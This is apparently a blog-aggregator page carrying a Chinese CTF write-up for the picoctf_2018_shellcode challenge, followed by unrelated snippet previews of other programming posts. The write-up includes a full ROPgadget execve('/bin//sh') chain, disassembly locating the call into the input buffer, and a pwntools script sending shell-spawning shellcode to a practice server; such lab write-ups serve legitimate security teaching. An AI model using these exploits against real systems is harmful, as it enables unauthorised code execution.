当前位置：首页 > news >正文

picoctf_2018_shellcode

news 2025/12/16 9:48:27

picoctf_2018_shellcode

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

32位，啥都没开

这个看着挺大的，直接来个ROPchain，

#!/usr/bin/env python2# execve generated by ROPgadgetfrom struct import pack# Padding goes herep = ''p += pack('<I', 0x0806f05a) # pop edx ; retp += pack('<I', 0x080ea060) # @ .datap += pack('<I', 0x080b81f6) # pop eax ; retp += '/bin'p += pack('<I', 0x08054a0b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806f05a) # pop edx ; retp += pack('<I', 0x080ea064) # @ .data + 4p += pack('<I', 0x080b81f6) # pop eax ; retp += '//sh'p += pack('<I', 0x08054a0b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806f05a) # pop edx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x08049333) # xor eax, eax ; retp += pack('<I', 0x08054a0b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x080481c9) # pop ebx ; retp += pack('<I', 0x080ea060) # @ .datap += pack('<I', 0x080de995) # pop ecx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x0806f05a) # pop edx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x08049333) # xor eax, eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0805c312) # inc eax ; retp += pack('<I', 0x0806cc55) # int 0x80

还真有

，然后让我看看溢出点

main函数无法编译，（得看汇编了

（但是我们可以反汇编vuln函数

int __cdecl vuln(int a1)
{gets(a1);return puts(a1);
}

vuln很简单，但是a1在栈中的位置

我们看看main传了什么进去

.text:080488F2                 add     esp, 10h
.text:080488F5                 sub     esp, 0Ch
.text:080488F8                 lea     eax, [ebp+var_A0]
.text:080488FE                 push    eax
.text:080488FF                 call    vuln

把var_A0传入，也就是我们输入的位置，从var_A0开始写入

在观察一下main的汇编

发现一个东西

.text:08048914                 add     esp, 10h
.text:08048917                 lea     eax, [ebp+var_A0]
.text:0804891D                 call    eax
.text:0804891F                 mov     eax, 0
.text:08048924                 mov     ecx, [ebp+var_4]
.text:08048927                 leave

在main的后面有个call var_A0也就是说，我们写的东西能直接执行，并且也没开NX

思路

直接写shellcode

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25457,"./pwn",0)
context(os='linux', arch='i386',log_level='debug')sl(asm(shellcraft.sh()))ia()

在这里插入图片描述

picoctf_2018_shellcode

picoctf_2018_shellcode Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments32位，啥都没开这个看着挺大的，直接来个ROPchain，…...

编程日记 2023/10/2 1:28:22

Apache Derby的使用

Apache Derby是关系型数据库，可以嵌入式方式运行，也可以独立运行，当使用嵌入式方式运行时常用于单元测试，本篇我们就使用单元测试来探索Apache Derby的使用一、使用IDEA创建Maven项目打开IDEA创建Maven项目，这里我…...

编程日记 2023/10/2 1:27:21

图图相关知识有leetcode207课程表1(有环判断)以及210 课程表2(拓扑排序). 链表遍历 def dfs(n):print(n)dfs(n)二叉树遍历 def dfs(n):print(n)dfs(n.left)dfs(n.right)多叉树遍历 dfs(root) def dfs(n):for node in n.nodes:dfs(node)图遍历 visited [False] * n_node…...

编程日记 2023/10/2 1:21:15

程序员们，我们能工作到65岁吗？

软件开发人员的职业生涯可以持续多久？这是大多数认真考虑成为专业程序员的人不禁想知道的事情。在谈论这样一个要求很高的职业时，这是一个非常自然的问题。没有人愿意花费数年时间学习一项技能，这些技能将在几年内不再相关，或者当…...

编程日记 2023/10/2 1:20:12

【洛谷 P1996】约瑟夫问题题解（队列+模拟+循环）

约瑟夫问题题目描述 n n n 个人围成一圈，从第一个人开始报数,数到 m m m 的人出列，再由下一个人重新从 1 1 1 开始报数，数到 m m m 的人再出圈，依次类推，直到所有的人都出圈，请输出依次出圈人的编号。…...

编程日记 2023/10/2 1:19:11

字符串函数与内存函数讲解

文章目录前言一、字符串函数1.求字符串长度strlen 2.长度不受限制的字符串函数(1)strcpy(2)strcat(3)strcmp 3.长度受限制的字符串函数(1)strncpy(2)strncat(3)strncmp 4.字符串查找(1)strstr(2)strtok 5.错误信息报告(1)strerror(2)perror 二、内存函数1.memcpy2.memmove3.me…...

编程日记 2023/10/2 1:18:10

c语言系统编程之多进程

程序与进程的区别？ 程序是静态的未运行的二进制文件，存储在磁盘中进程是已经运行的二进制文件，存储在内存中进程的内存划分图有哪几部分？ 堆（存储malloc和calloc出来的空间）、栈（局部变量…...

编程日记 2023/10/2 1:13:06

前端还是后端：探讨Web开发的两大街区

前端还是后端：探讨Web开发的两大街区一、引言二、两者的对比分析技能要求和专业知识职责和工作内容项目类型和应用领域就业前景和市场需求三、技能转换和跨领域工作四、全栈开发结语一、引言 Web开发领域涉及到前端开发和后端开发这两个不同而又互为补充的领域。…...

编程日记 2023/10/2 1:11:04

JavaScript中如何确定this的值？如何指定this的值？

🎀JavaScript中的this 在绝大多数情况下，函数的调用方法决定了this的值（运行时绑定）。this不能在执行期间被赋值，并且在每次函数呗调用时this的值也可能会不同。 🍿如何确定this的值： 在非严格…...

编程日记 2023/10/2 1:09:02

ubuntu下源码编译方式安装opencv

基础条件 ubuntu 20.04 opencv 3.4.3 opencv 源码编译的安装步骤第一步， 首先clone源码 git clone https://github.com/opencv/opencv.git第二步，依赖包，执行下面的命令 sudo apt-get install build-essential sudo apt-get install cmak…...

编程日记 2023/10/2 1:08:01

spring boot整合常用redis客户端（Jedis、Lettuce、RedisTemplate、Redisson）常见场景解决方案

Java操作redis有三种客户端供选择：Jedis、Lettuce、Redisson。在实际项目中运用最多的客户端还是Redisson、RedisTemplate；其中RedisTemplate并非是一个新的redis客户端实现，RedisTemplate是Spring Data Redis中提供的封装好的redis操作模板…...

编程日记 2023/10/2 1:05:59

HarmonyOS之运行Hello World

目录下载与安装DevEco Studio 配置环境创建项目认识DevEco Studio界面运行Hello World 了解基本工程目录工程级目录模块级目录...

编程日记 2023/10/2 1:04:58

postgresql数据库|wal日志的开启以及如何管理

一， wal的基本概念 WAL即Write Ahead Log预写式日志,简称wal日志,相当于oracle中的redo日志。只是oracle中redo是固定几个redo日志文件,然后轮着切换去写入。pg中wal日志是动态切换,单个wal日志写满继续写下一个wal日志，连续不断生成wal日志。&#xf…...

编程日记 2023/10/2 1:03:58

小波变换学习笔记【1】

【声明】本博客为学习B站视频小波分解与重构所做笔记，供自己和大家查阅学习，想查看 up 原视频请移步 B 站，侵删。 1.1 小波变换的由来傅里叶变换基本思想：将信号分解成一系列不同频率的连续正弦波的叠加。其缺点是，…...

编程日记 2023/10/2 1:01:56

雷柏mv20鼠标使用体验

用了1年多，第一次用竖着的鼠标，现在已经很习惯了，感觉还不错。说说使用感受： 1、仍然是长时间使用鼠标，但是很少出现手腕痛的情况，确实是有一定效果的。 2、使用场景是有限制的，我是配合笔记…...

编程日记 2023/10/2 0:59:54

【分布式云储存】Springboot微服务接入MinIO实现文件服务

文章目录前言技术回顾准备工作申请accessKey\secretKey创建数据存储桶公共资源直接访问测试接入springboot实现文件服务依赖引入配置文件MinIO配置MinIO工具类 OkHttpSSLSocketClient兼容ssl静态资源预览解决方案资源上传预览测试测试结果前言上篇博客我们介绍了分布式云存…...

编程日记 2023/10/2 0:58:53

机器人中的数值优化|【四】L-BFGS理论推导与延伸

机器人中的数值优化|【四】L-BFGS理论推导与延伸往期内容回顾机器人中的数值优化|【一】数值优化基础机器人中的数值优化|【二】最速下降法，可行牛顿法的python实现，以Rosenbrock function为例机器人中的数值优化|【三】无约束优化，拟牛…...

编程日记 2023/10/2 0:56:51

ThemeForest – Canvas 7.2.0 – 多用途 HTML5 模板

ThemeForest 上的 HTML 网站模板受到全球数百万客户的喜爱。与包含网站所有页面并允许您在 WP 仪表板中自定义字体和样式的 WordPress 主题不同，这些设计模板是用 HTML 构建的。您可以在 HTML 编辑器中编辑模板，但不能在 WordPress 上编辑模板&#xff0…...

编程日记 2023/10/2 0:55:50

本地部署川虎 Chat

本地部署川虎 Chat 1. 川虎 Chat 项目概述2. Github 地址3. 部署川虎 Chat4. 配置 config.json5. 启动川虎 Chat 1. 川虎 Chat 项目概述为ChatGPT等多种LLM提供了一个轻快好用的Web图形界面和众多附加功能。支持 GPT-4 基于文件问答 LLM本地部署联网搜索 Agent 助理…...

编程日记 2023/10/2 0:54:49

IntelliJ IDEA 控制台中文乱码的四种解决方法

前言 IntelliJ IDEA 如果不进行配置的话，运行程序时控制台有时候会遇到中文乱码，中文乱码问题非常严重，甚至影响我们对信息的获取和程序的跟踪。开发体验非常不好。本文中我总结出四点用于解决控制台中文乱码问题的方法，希望有助…...

编程日记 2023/10/2 0:53:48

React Native 导航系统实战（React Navigation）

导航系统实战（React Navigation） React Navigation 是 React Native 应用中最常用的导航库之一，它提供了多种导航模式，如堆栈导航（Stack Navigator）、标签导航（Tab Navigator）和抽屉…...

编程新知 2025/10/15 5:04:46

【论文笔记】若干矿井粉尘检测算法概述

总的来说，传统机器学习、传统机器学习与深度学习的结合、LSTM等算法所需要的数据集来源于矿井传感器测量的粉尘浓度，通过建立回归模型来预测未来矿井的粉尘浓度。传统机器学习算法性能易受数据中极端值的影响。YOLO等计算机视觉算法所需要的数据集来源于…...

编程新知 2025/10/14 10:52:24

Rust 异步编程

Rust 异步编程引言 Rust 是一种系统编程语言，以其高性能、安全性以及零成本抽象而著称。在多核处理器成为主流的今天，异步编程成为了一种提高应用性能、优化资源利用的有效手段。本文将深入探讨 Rust 异步编程的核心概念、常用库以及最佳实践。异步编程基础什么是异步…...

编程新知 2025/11/17 18:58:56

【C语言练习】080. 使用C语言实现简单的数据库操作

080. 使用C语言实现简单的数据库操作 080. 使用C语言实现简单的数据库操作使用原生APIODBC接口第三方库ORM框架文件模拟1. 安装SQLite2. 示例代码：使用SQLite创建数据库、表和插入数据3. 编译和运行4. 示例运行输出：5. 注意事项6. 总结080. 使用C语言实现简单的数据库操作在…...

编程新知 2025/9/22 21:37:01